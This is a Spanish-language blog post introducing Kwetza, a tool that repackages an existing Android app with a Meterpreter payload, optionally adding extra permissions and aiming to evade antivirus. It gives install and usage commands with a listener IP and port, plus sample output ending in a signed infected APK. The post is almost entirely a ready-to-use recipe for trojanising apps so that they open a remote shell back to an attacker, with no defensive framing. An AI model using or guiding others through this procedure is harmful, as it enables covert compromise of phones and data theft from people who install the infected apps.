Kwetza es una herramienta que le permite infectar una aplicación Android existente con un payload Meterpreter.

¿Qué hace?

Kwetza infecta una aplicación Android existente con plantillas de payloads personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza te permite infectar las aplicaciones de Android utilizando los permisos predeterminados de la aplicación de destino o inyectar permisos adicionales para obtener funcionalidad adicional.

Instalación:

git clone https://github.com/sensepost/kwetza.git

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:

pip install beautifulsoup4

Kwetza requiere que Apktool sea instalado y accesible a través de su PATH. Esto se puede configurar usando las instrucciones de instalación que se encuentran aquí: https://ibotpeaches.github.io/Apktool/install

Modo de uso:

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

nameOfTheApkToInfect.apk =name of the APK you wish to infect.
LHOST =IP of your listener.
LPORT =Port of your listener.
yes =include “yes” to inject additional evil perms into the app, “no” to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes

[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk

Información

Kwetza ha sido desarrollado para trabajar con Python 2.
Kwetza usará por defecto la plantilla y el keystore ubicados en la carpeta «payload» para inyectar y firmar el apk infectado.
Si desea firmar la aplicación infectada con su propio certificado, genere un nuevo keystore y colóquelo en la carpeta «payload» y cambie el nombre al keystore existente o cambie la referencia en kwetza.py.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el keystore predeterminado es, «password».

Descarga: https://github.com/sensepost/kwetza

 

Posts Relacionados

Comments

comments

Deja una respuesta

Tu email no será publicado. Los campos requeridos estan marcados con *
Puedes usar tags HTML y los atributos: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>